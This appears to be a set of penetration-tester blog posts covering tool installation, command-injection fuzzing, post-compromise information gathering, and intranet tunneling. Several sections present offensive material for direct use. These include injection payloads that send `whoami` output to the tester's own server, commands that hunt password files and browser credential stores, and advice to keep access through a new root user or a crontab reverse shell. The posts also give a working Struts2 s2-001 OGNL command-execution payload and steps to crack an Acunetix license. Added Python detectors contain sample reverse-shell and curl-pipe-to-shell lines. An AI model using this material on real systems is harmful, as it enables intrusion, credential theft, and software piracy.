gem sources --add https://gems.ruby-china.com/ --remove https://rubygems.org/
npm config set registry https://registry.npm.taobao.org
  • Dependency errors
gem install aquatone && npm install electron && npm install nightmare
Building native extensions. This could take a while...
ERROR:  Error installing aquatone:
        ERROR: Failed to build gem native extension.

    current directory: /var/lib/gems/2.7.0/gems/ffi-1.13.1/ext/ffi_c
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20200713-12887-ohoa28.rb extconf.rb
mkmf.rb can't find header files for ruby at /usr/lib/ruby/include/ruby.h

You might have to install separate package for the ruby development
environment, ruby-dev or ruby-devel for example.

Whatever dependency the error names, install that dependency. Taking the message above on its own, it says:

  • You might have to install separate package for the ruby development environment, ruby-dev or ruby-devel for example.
$ sudo apt install ruby-dev
(ruby-dev is the Debian/Kali package name; ruby-devel is the Red Hat/Fedora one, so apt will not find it.) With the dependency installed it works.

Then run it again:

Building native extensions. This could take a while...
Successfully installed ffi-1.13.1
Successfully installed childprocess-0.7.1
Successfully installed multi_xml-0.6.0
When you HTTParty, you must party hard!
Successfully installed httparty-0.14.0
Successfully installed aquatone-0.5.0
Parsing documentation for ffi-1.13.1
Installing ri documentation for ffi-1.13.1
Parsing documentation for childprocess-0.7.1
Installing ri documentation for childprocess-0.7.1
Parsing documentation for multi_xml-0.6.0
Installing ri documentation for multi_xml-0.6.0
Parsing documentation for httparty-0.14.0
Installing ri documentation for httparty-0.14.0
Parsing documentation for aquatone-0.5.0
Installing ri documentation for aquatone-0.5.0
Done installing documentation for ffi, childprocess, multi_xml, httparty, aquatone after 6 seconds

Note: export LC_ALL=C

  • Change the npm source, same as for gem :-)
npm install -g electron --registry=https://registry.npm.taobao.org

DEBUG=nightmare xvfb-run aquatone-gather -d ksyun.com --threads 10

npm install --save nightmare --unsafe-perm=true --allow-root --registry=https://registry.npm.taobao.org
https://gh0st.cn/archives/2018-09-02/1

Problems

  • aq-gather fails with an error about nightmare

aq has one more issue: if aquatone-gather errors, run the following, which downloads a shell script into the bin folder and runs it.

wget "https://gist.githubusercontent.com/random-robbie/beae1991e9ad139c6168c385d8a31f7d/raw/aq.sh" -O /bin/aq && chmod 777 /bin/aq, then just run aq. (Read a script fetched from a gist before running it as root, and 755 is enough: a world-writable file in /bin hands every local user a way to run code as whoever calls aq.)

  • aq error: issue running aquatone
goroutine 6807 [running]:
runtime.throw(0x14dee2a, 0x21)

Set the threads and timeout parameters: lower the thread count and raise the timeout; check the tool's help for the thread-count parameter and the timeout format.

awvs Linux install

  • awvs 13 is still very nice.

To keep the original license from being invalidated, run the following commands as soon as possible; otherwise the license file gets modified and the crack no longer succeeds.

root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json
root@kali:~# rm -fr /home/acunetix/.acunetix_trial/data/license/wa_data.dat
root@kali:~# touch /home/acunetix/.acunetix_trial/data/license/wa_data.dat
root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/wa_data.dat
  • Personal strong recommendation: the docker version.

The command to pull the docker image can be found on 国光's blog.

[Read More]

Preface:

During web attack-and-defence work we often get a hunch at command-execution points: when the request is released in Burp, the byte size of the response is strangely off. Experienced testers then simply run an RCE fuzz list, so this post collects some fuzzing tricks used during web attack-and-defence.

Fuzzing for server-side RCE

  • Fuzzing a Windows host

After the key parameter, append pipe and connector characters followed by a command, blind-firing command execution:

|| and &

  • Fuzzing a Linux host

Same as above:

|| and &

  • Getting around filtered spaces on Linux:
    ${IFS}, $IFS, $IFS$9

  • Testing inside JSON:
    \u000awget\u0020 http://ip

Backticks work on Linux, not on Windows.

A normal RCE test on Linux:

Start a web server on your own machine; it has to be up and listening before you send the test:

bin4xin@bin4xin's MacbookPro tools % python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...

The RCE fuzz command:

bin4xin@bin4xin's MacbookPro tools % curl 192.168.101.51:8000/`whoami`

And, looking from the other side at the web server's log:

::ffff:192.168.101.51 - - [19/Sep/2020 13:57:25] "GET /bin4xin HTTP/1.1" 301 -

The shell expanded `whoami` before curl ran, so the user name arrived as the request path. The same thinking extends to:

ping `whoami`.<your server>

which works with ping (the output becomes a DNS label) just as with curl.

Some special-character bypasses:

curl http://<your server>/$(whoami)

curl http://<your server>/$(whoami|base64)

'w'g'e't${IFS}<your server>

Try the effect of these on Linux yourself.

Windows probing:

The fuzzing approach is the same; only the commands differ;

ping %USERNAME%.<your server>
------
(get the computer name)
for /F %x in ('whoami') do start http://<your server>/%x
------
(get the user name)
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.<your server>
------
Testing an e-mail field: `wget%209<your server>/xxxx`@qq.com

Testing an upload: `sleep 10`filename

Testing a filename: `||wget%20<your server>`

Testing names in an upload form: ;payload|payload&payload
;whoami|whoami&whoami
------
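The bypass forms listed above seen from the detection side, as an added example that is not part of the original post: normalize() undoes the tricks (${IFS}/$IFS$9 for spaces, quote splitting such as 'w'g'e't, JSON \uXXXX escapes, backslash-broken words) so a rule or a log reviewer sees the command the shell would actually run; is_injection() flags a parameter value that carries both a shell separator or substitution and a command keyword; oob_token() pulls the exfiltrated token out of the callback server's access log and decodes it when the `whoami|base64` form was used. The log lines in the test are constructed after the http.server line above:

```python
"""Normaliser and detector for command-injection fuzz payloads, plus an
out-of-band hit decoder. Added example, not from the original post."""
import base64
import binascii
import re

IFS_FORMS = re.compile(r"\$\{IFS\}|\$IFS(?:\$\d)?")          # ${IFS}, $IFS, $IFS$9
JSON_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")             # \u000a, \u0020 inside JSON strings
SEPARATORS = re.compile(r"\|\||&&|[;|&`\n]|\$\(")            # chaining, pipes, backticks, $( )
COMMANDS = re.compile(r"\b(wget|curl|ping|nslookup|dig|whoami|id|sleep|nc|bash|sh|python)\b")
ACCESS_RE = re.compile(r'"(?:GET|POST|HEAD) /([^ ?"]*)')     # path token of an access-log line


def normalize(payload):
    """Collapse the evasion forms so a rule sees `wget 1.2.3.4` rather than 'w'g'e't${IFS}1.2.3.4."""
    s = JSON_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), payload)  # \u000a -> newline, \u0020 -> space
    s = IFS_FORMS.sub(" ", s)                                           # every $IFS spelling -> space
    s = re.sub(r"\\(?=\w)", "", s)                                      # w\get -> wget
    s = s.replace("'", "").replace('"', "")                             # 'w'g'e't -> wget (sh concatenates)
    return s


def is_injection(value):
    """True when the normalised value has a separator/substitution and a command keyword.
    Requiring both keeps ordinary query strings (a&b=c) and plain words (id=5) quiet."""
    s = normalize(value)
    return bool(SEPARATORS.search(s)) and bool(COMMANDS.search(s))


def oob_token(access_log_line):
    """(raw_path_token, decoded) from a callback-server log line; decoded is set only when the
    token is valid base64 of printable text, as produced by the $(whoami|base64) form."""
    m = ACCESS_RE.search(access_log_line)
    if not m or not m.group(1):
        return None
    token = m.group(1)
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
        decoded = decoded if decoded.isprintable() else None
    except (binascii.Error, UnicodeDecodeError):
        decoded = None
    return token, decoded


if __name__ == "__main__":
    for p in ("'w'g'e't${IFS}1.2.3.4", "||wget$IFS$9http://1.2.3.4", "page=2"):
        print(repr(p), "->", repr(normalize(p)), is_injection(p))
```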

Personal-machine information gathering

  1. Browser [Chrome, Firefox, Edge, IE, 360, QQ] data (history, passwords, bookmarks, cookies):

    %LocalAppData%\Google\Chrome\User Data\Default
    %APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\
    
  2. Sensitive files on the machine, by keyword: account, password, backup, login, admin, mailbox, backend, assets, network (the patterns below use the Chinese words for password and account)

    for /r D:\ %i in (*密码*) do @echo %i
    for /r D:\ %i in (*vpn*) do @echo %i
    for /r D:\ %i in (*账号*) do @echo %i
    
  3. Processes

    • AV / EDR
    • TeamViewer and other remote-management tools
    • service processes: mssql / java / web servers
  4. Installed software list

  5. Passwords held by the Windows credential manager

    • logon password (mimikatz)

    • Wi-Fi passwords

    • Outlook passwords

    • ……

  6. Open ports / firewall configuration / shares

    netstat -nao
    wmic share  get name,path,status  # list shares with wmic
    
  7. All RDP connection records on the machine

  8. All drives

    wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,volumeserialnumber,size #list partitions
    
  9. All sensitive files on every drive

    .doc\xlsx\md\sql\ppt*\txt

    for /r D:\ %i in (*.doc) do @echo %i
    for /r D:\ %i in (*.xlsx) do @echo %i
    for /r D:\ %i in (*.ppt*) do @echo %i
    
  10. Local environment

    • hosts
    • environment variables
    • patch list
    • current sessions on the host

Work was light, so I summarised an approach to gathering information from a personal office machine

[Read More]

I have been through several HW exercises and was lucky enough to get a server each time, so the internal-network pentest at my company ended up being mine every time. This records the internal information-gathering process and the small tricks I have accumulated along the way.

passwd

Shells obtained through shiro or struts2 are root most of the time, and many people go straight for the passwd file (the hashes themselves are in /etc/shadow). It is rarely worth it. Below is a run of hashcat over the hash file on a 2-core, 4 GB server. It normally recovers nothing: sha512crypt is a salted, deliberately slow hash, so it cannot be reversed, a rainbow table does not apply to salted hashes, and a CPU manages only a few hundred guesses per second; only a weak password that happens to be in the wordlist will fall.

hashcat -m 1800 -a 0 -o found.txt linux-root.txt /usr/share/john/password.lst --force
hashcat (v4.0.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz, 256/738 MB allocatable, 1MCU

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Uses-64-Bit

Password length minimum: 0
Password length maximum: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
* Device #1: Kernel m01800.8f866878.kernel not found in cache! Building may take a while...

continuing :(

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => Dictionary cache built:
* Filename..: /usr/share/john/password.lst
* Passwords.: 3559
* Bytes.....: 26325
* Keyspace..: 3559
* Runtime...: 0 secs

- Device #1: autotuned kernel-accel to 128
- Device #1: autotuned kernel-loops to 128
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoApproaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: linux-root.txt
Time.Started.....: Mon Jun  8 11:29:25 2020 (23 secs)
Time.Estimated...: Mon Jun  8 11:29:48 2020 (0 secs)
Guess.Base.......: File (/usr/share/john/password.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      311 H/s (8.82ms)
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 7118/7118 (100.00%)
Rejected.........: 0/7118 (0.00%)
Restore.Point....: 3559/3559 (100.00%)
Candidates.#1....: doom2 -> sss
HWMon.Dev.#1.....: N/A

Started: Mon Jun  8 11:28:50 2020
Stopped: Mon Jun  8 11:29:49 2020
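The hashcat run above is slow because sha512crypt ($6$) iterates its hash, 5000 rounds by default, and the rounds= field in the shadow entry raises that cost further. The following Python, an added example rather than code from the post, parses shadow-format lines (a constructed sample; the hash strings are placeholders) and flags accounts whose password field is empty, uses a legacy algorithm, or runs fewer rounds than an assumed policy threshold of 65536. That is the defender-side check that decides whether a dump like this one is worth anything at all.

```python
import re

# Hash identifiers as they appear in the $id$ prefix of a shadow password field.
ALGO_BY_ID = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt",
}
# Cost used when no rounds= parameter is present (glibc crypt default).
DEFAULT_ROUNDS = {"sha256crypt": 5000, "sha512crypt": 5000}


def parse_hash_field(field):
    """Classify one shadow password field -> (status, algorithm, rounds)."""
    if field == "":
        return ("empty", None, None)          # no password: logon needs none
    if field.startswith(("!", "*")):
        return ("locked", None, None)         # account locked / no password login
    m = re.match(r"^\$([^$]+)\$(.*)$", field)
    if not m:
        return ("hashed", "descrypt", None)   # 13-char traditional DES crypt
    ident, rest = m.group(1), m.group(2)
    algo = ALGO_BY_ID.get(ident, "unknown:" + ident)
    rm = re.match(r"rounds=(\d+)\$", rest)
    if rm:
        rounds = int(rm.group(1))
    else:
        rounds = DEFAULT_ROUNDS.get(algo)
    return ("hashed", algo, rounds)


def audit_shadow(lines, min_rounds=65536):
    """Return (user, severity, reason) findings; min_rounds is an assumed policy threshold."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        user, field = parts[0], parts[1]
        status, algo, rounds = parse_hash_field(field)
        if status == "empty":
            findings.append((user, "CRITICAL", "empty password field"))
        elif status == "hashed" and algo in ("descrypt", "md5crypt"):
            findings.append((user, "HIGH", "weak hash algorithm " + algo))
        elif status == "hashed" and algo in DEFAULT_ROUNDS and rounds < min_rounds:
            findings.append((user, "MEDIUM", "%s with only %d rounds" % (algo, rounds)))
    return findings


# Constructed sample; the hash values are placeholders, not real password hashes.
SAMPLE_SHADOW = [
    "root:$6$saltsalt$PLACEHOLDERHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:18421:0:99999:7:::",
    "daemon:*:18421:0:99999:7:::",
    "alice:$6$rounds=500000$saltsalt$PLACEHOLDERHASHyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:18421:0:99999:7:::",
    "bob:$1$saltsalt$PLACEHOLDERHASHzzzzzzzzzzz:18421:0:99999:7:::",
    "svc::18421:0:99999:7:::",
    "carol:$y$j9T$saltsalt$PLACEHOLDERHASHwwwwwwwwwwwwwwwwwwwwwwww:18421:0:99999:7:::",
]

if __name__ == "__main__":
    for user, sev, why in audit_shadow(SAMPLE_SHADOW):
        print("%-8s %-8s %s" % (user, sev, why))
```

The root entry in the sample is the shape of the hashes hashcat was fed above: sha512crypt at the default 5000 rounds. Raising rounds (or moving to yescrypt) multiplies the attacker's cost per guess, which is the real reason a dictionary run like the one shown exhausts without a hit.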

It is generally recommended to create a new user as root to maintain access, or to write a crontab entry that periodically spawns a reverse shell. In practice very few ops or developers check scheduled tasks for reverse-shell scripts, so this basically satisfies the conditions for continued penetration.
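Since, as noted above, few operators look at scheduled tasks, a crontab audit is cheap detection. The Python below is an added example and not part of the post: it parses user-crontab lines (a constructed sample; 203.0.113.10 is a documentation address) and flags commands carrying reverse-shell or download-and-run indicators such as /dev/tcp, bash -i, nc -e, curl | sh, base64 -d, or binaries run from /tmp. The signal names are mine.

```python
import re

# Signals that a scheduled command is a reverse shell or a download-and-run dropper.
SUSPICIOUS = [
    ("dev_tcp", re.compile(r"/dev/(?:tcp|udp)/")),
    ("interactive_shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
    ("nc_exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s")),
    ("pipe_to_shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")),
    ("base64_decode", re.compile(r"base64\s+(?:-d|--decode)")),
    ("exec_from_tmp", re.compile(r"(?:^|\s)/(?:tmp|dev/shm|var/tmp)/\S+")),
]

# A crontab entry: either an @keyword or five time fields, then the command
# (user-crontab format; /etc/crontab adds a user field that this does not parse).
CRON_RE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")


def parse_cron_line(line):
    """Return (schedule, command) for an entry, or None for comments/env lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^\w+=", s):
        return None
    m = CRON_RE.match(s)
    if not m:
        return None
    return (m.group(1).strip(), m.group(2).strip())


def scan_crontab(text):
    """Return (lineno, schedule, command, reasons) for every entry that trips a signal."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = [name for name, rx in SUSPICIOUS if rx.search(command)]
        if reasons:
            hits.append((lineno, schedule, command, reasons))
    return hits


# Constructed sample crontab; 203.0.113.10 is a documentation address, not a real host.
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "SHELL=/bin/bash",
    "PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/bin:/bin",
    "0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1",
    '*/5 * * * * /bin/bash -c "bash -i >& /dev/tcp/203.0.113.10/12341 0>&1"',
    "@reboot /tmp/.x/agent",
    "30 1 * * 0 curl -s http://203.0.113.10/u.sh | sh",
])

if __name__ == "__main__":
    for lineno, schedule, command, reasons in scan_crontab(SAMPLE_CRONTAB):
        print("line %d [%s] %s -> %s" % (lineno, ", ".join(reasons), schedule, command))
```

Run it over the output of crontab -l for every user plus the files under /etc/cron.d and /var/spool/cron; the backup job in the sample passes untouched, while the three planted entries are each caught by a different signal.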

Information-gathering phase

  • Configuration files

Database configuration: from configuration files such as MyBatis's you get the corresponding database machines on the intranet, usually with low privileges, high ones if lucky. With even more luck there is a high-privilege MSSQL database; try connecting and use xp_cmdshell to execute commands.

Sometimes the machine you get has some peculiarity, such as being a Docker container or a bare database machine; then do whatever collection you can. Docker machines in particular, apart from the service they run, are too clean inside, with basically nothing to leverage.

Search the current directory for files containing the string 'mysql'
grep -rn "mysql" .
=======
View the system's sensitive configuration file
cat static/scripts/tinymce/js/tinymce/plugins/jbimages/ci/application/config/database.php
=======
curl ifconfig.me
120.25.13.49

Machines obtained via the web layer are generally web servers, i.e. they carry all kinds of jar packages, so the server stores a large number of configuration files

ps -ef|grep java

netstat -antup

From the process list you can find the directory where the jars are deployed and their dependencies; most ops and developers habitually create a data directory under the root, or a directory outside the system folders, to hold the web application's dependency jars, and that can be our breakthrough point. Check which ports are open and the corresponding directory locations; with some shell basics you can collect this information.

  • bash_history

The command history file is generally a must-read; it holds things you would not expect. Below is a small excerpt of a surprise I found during a real intranet engagement:

su root
crontab -e
su rppt
su root
crontab -e
crontab -l
ll
cd domain/
ll
cd nexus3/
ll
cd nexus-3.12.0-01
ll
cd bin/
./nexus start
pactera@575
cd domain/
ll
cd nexus3/

Note the "command" between ./nexus start and cd domain/: yes, that is the sudoer user's password; su with it and you have root directly. Let's analyze why this happens: my view is that running the nexus program required a password to elevate privileges, and the operator, while waiting, did not notice that the password prompt had not yet been echoed and typed the password, so the system recorded it into the history file as an executed command.


After discovering this, I immediately looked at the history files on my own server and on my Mac, searched for the machine password keyword, and found the same phenomenon: plaintext passwords stored inside.

An eye-opener

To sum up, intranet information gathering requires attention to detail.
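The leak described above, a password typed before the prompt appeared, leaves a recognizable trace: a one-token history line that is neither a command nor a path, right after a line that would have prompted for a password. The Python below is an added example, not the post's code; it scans history lines (a constructed sample mimicking the excerpt, with placeholder secrets) for that pattern and for credentials passed on the command line. The command allowlist and the regexes are assumptions for the demo.

```python
import re

# Commands expected as the first word of a history line (constructed allowlist).
KNOWN_COMMANDS = {
    "ls", "ll", "cd", "cat", "vim", "vi", "less", "more", "crontab", "su", "sudo",
    "ssh", "scp", "git", "ps", "netstat", "grep", "exit", "history", "clear", "pwd",
    "mkdir", "rm", "cp", "mv", "tar", "wget", "curl", "top", "df", "free", "mysql",
    "java", "python", "python3", "docker", "systemctl", "service", "kill", "echo",
}
# Lines that prompt for a password: a stray token typed right after one of these is
# very likely the password itself, echoed into history because the prompt was late.
AUTH_PROMPTS = re.compile(r"^(?:sudo|su|ssh|scp|mysql|psql|passwd|\./\S+)\b")
# Credentials passed on the command line itself.
INLINE_SECRET = re.compile(
    r"(?:\bmysql\b.*\s-p\S+|--password[= ]\S+|\b(?:password|passwd|pwd)=\S+|\s-u\s*\w+:\S+)",
    re.IGNORECASE,
)


def looks_like_stray_secret(line):
    """One token, not a known command or a path, with digits/symbols: a typed password."""
    tokens = line.split()
    if len(tokens) != 1:
        return False
    tok = tokens[0]
    if tok in KNOWN_COMMANDS or tok.startswith(("/", "./", "~")) or tok.isalpha():
        return False
    return 6 <= len(tok) <= 64 and re.search(r"[0-9@#$%!*^_.+-]", tok) is not None


def scan_history(lines):
    """Return (lineno, kind, line) for history entries that look like leaked credentials."""
    findings = []
    prev = ""
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line:
            continue
        if INLINE_SECRET.search(line):
            findings.append((n, "inline-credential", line))
        elif looks_like_stray_secret(line):
            kind = "stray-token-after-auth" if AUTH_PROMPTS.match(prev) else "stray-token"
            findings.append((n, kind, line))
        prev = line
    return findings


# Constructed history mimicking the pattern in the excerpt; the secrets are placeholders.
SAMPLE_HISTORY = [
    "cd domain/", "ll", "cd nexus3/", "cd bin/", "./nexus start",
    "N0t-a-Real-Pa55w0rd!", "su root", "crontab -l",
    "mysql -uroot -pPlaceholderPw1", "ls", "exit",
]

if __name__ == "__main__":
    for n, kind, line in scan_history(SAMPLE_HISTORY):
        print("%3d %-24s %s" % (n, kind, line))
```

Running this over ~/.bash_history of each account (and over your own, as the author did) turns the "eye-opener" into a routine hygiene check; hits of the stray-token kind are the ones to rotate immediately, since the history file is readable by anyone who lands on the box.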

Intranet tunneling (port forwarding)

Before writing, we need to be clear on one point: what is the intranet target we need? What is the difference between intranet tunneling and intranet proxying? In which situations do we need tunneling, and when do we need a proxy?

python3 reGeorgSocksProxy.py -p 9999 -l 0.0.0.0 -u https://www.pgyer.com/tunnel.nosocket.php

Intranet tunneling targets one specific port on a machine and exposes it to the public internet through traffic forwarding. For example: we have taken a Linux machine which, conveniently, is an ops machine, and we have found a large number of ops account credentials. Then we find the Windows remote-login service, port 3389. At that point we can use port forwarding to send the port's traffic to a port on a public host we control (e.g. 33890); requests made to our own public port are then requests to that Windows machine, so we can easily connect to it with the account and password we obtained.

So the ultimate purpose of intranet tunneling is obvious: when we know sensitive information about an intranet server (such as 3389 remote-connection credentials or 3306 credentials) but cannot use a Windows remote-desktop client or mysql-client inside the intranet to clearly verify what we have, we can use tunneling, i.e. traffic forwarding, for further verification.

Intranet proxy

An intranet proxy, as the name implies, is our own controlled host using various proxy methods (socks5, socks4) with the captured intranet server as an intermediate hop for forwarding traffic, to do whatever we want on the intranet. In this case our proxy machine has no specific identity on the intranet; we simply send the traffic we aim at the intranet through the controlled intranet server via the proxy.

frp proxy

Strongly recommended. Once the proxy is up you are already in the intranet; very convenient. Only the VPS (frps) side needs configuring; after getting a shell, download the frpc client and start the service. Windows: proxifier; Linux: frpc

lcx proxy

Never used it, only heard of it.


「Docker」:use docker elegant:)

May 27, 2020. | By: Bin4xin

There are many tutorials online on building vulhub with Docker, so I won't reinvent the wheel. Here I record some problems encountered in daily Docker use

Common Docker commands

Connection reset

Burp Suite Professional Error: Connection reset / This page cannot be displayed right now / This request cannot be processed right now. HTTP ERROR 503

Earlier I was reproducing the struts2/s2-057 vulnerability, and since it was my own server I hammered it every which way, scanners and all. In the end the target environment broke. Let's try whether reinstalling the image fixes it :( I grabbed an arbitrary image as the example here

docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
xdebug-rce_php      latest              6026f10530db        3 days ago          393MB
vulhub/php          7.1.12-apache       10fffe5b286c        2 years ago         392MB
vulhub/tomcat       8.5                 66ba03f6c1d8        3 years ago         367MB
vulhub/tomcat       8.0                 458575a05d97        3 years ago         357MB

Delete a local image

docker rmi 6026f10530db
Untagged: xdebug-rce_php:latest
Deleted: sha256:6026f10530db39c61d31e0461ccbff4786e8c604c34f8ff8167d7ac89c81446a
Deleted: sha256:4ce36271980f0f494e1a935bdaced37ea38d08fb167d54c50440fc009df315f9
Deleted: sha256:d43d3fbbbb36edd2dbedd5df458789c7c57b5fd366403830bb6ac01b42b743d7
Deleted: sha256:b15d563c13eccd51017c2bfa269f322744cb476c4c62749d5356cd0069d6391d

If deletion fails with an error, most likely a container from that image is still running in Docker; just stop it.

docker rm 6026f10530db      # remove a stopped container
docker rm -f 6026f10530db   # force-remove a running container

Enter a container and execute commands

What matters is the CONTAINER ID value; run docker ps to see it:

sudo docker exec -it 775c7c9ee1e1 /bin/bash
  • Error:
go install: no install location for directory outside GOPATH:

Reference: https://stackoverflow.com/questions/26134975/go-install-no-install-location-for-directory-outside-gopath

Once inside the container you can run commands directly, e.g. ifconfig:

br-4c7c2091db92: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.24.0.1  netmask 255.255.0.0  broadcast 172.24.255.255
        inet6 fe80::42:b7ff:feb7:f51d  prefixlen 64  scopeid 0x20<link>
        ether 02:42:b7:b7:f5:1d  txqueuelen 0  (Ethernet)
        RX packets 46  bytes 4538 (4.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 65  bytes 4778 (4.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        inet6 fe80::42:94ff:feb9:c3dc  prefixlen 64  scopeid 0x20<link>
        ether 02:42:94:b9:c3:dc  txqueuelen 0  (Ethernet)
        RX packets 1602494  bytes 995390708 (949.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1434833  bytes 872808706 (832.3 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.185.134  netmask 255.255.240.0  broadcast 172.17.191.255
        inet6 fe80::216:3eff:fe03:a170  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:03:a1:70  txqueuelen 1000  (Ethernet)
        RX packets 6405140  bytes 5419609300 (5.0 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4733596  bytes 1372915223 (1.2 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 20372  bytes 1792815 (1.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20372  bytes 1792815 (1.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth382577a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::b067:b9ff:fece:612b  prefixlen 64  scopeid 0x20<link>
        ether b2:67:b9:ce:61:2b  txqueuelen 0  (Ethernet)
        RX packets 46  bytes 5182 (5.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 83  bytes 6263 (6.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

iptables:

iptables -L
# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
DOCKER-USER  all  --  anywhere             anywhere
DOCKER-ISOLATION-STAGE-1  all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
DOCKER     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
DOCKER     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain DOCKER (2 references)
target     prot opt source               destination
ACCEPT     tcp  --  anywhere             172.24.0.2           tcp dpt:http-alt

Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target     prot opt source               destination
DOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere
DOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere
RETURN     all  --  anywhere             anywhere

Chain DOCKER-USER (1 references)
target     prot opt source               destination
RETURN     all  --  anywhere             anywhere

Chain DOCKER-ISOLATION-STAGE-2 (2 references)
target     prot opt source               destination
DROP       all  --  anywhere             anywhere
DROP       all  --  anywhere             anywhere
RETURN     all  --  anywhere             anywhere


s2-001

struts2-001: when a user submits form data and validation fails, the backend parses the user's previously submitted parameter values with the OGNL expression %{value} and refills them into the corresponding form fields. For example, on a registration or login page, after a failed submission the backend usually returns the previously submitted data by default; because the backend runs one round of OGNL expression evaluation over the submitted data via %{value}, a payload can be constructed directly to execute commands.

Affected versions: Struts 2.0.0 - Struts 2.0.8

Payload code

%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

The response comes back as follows: below the injected whoami command the page shows root, so the execution succeeded.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
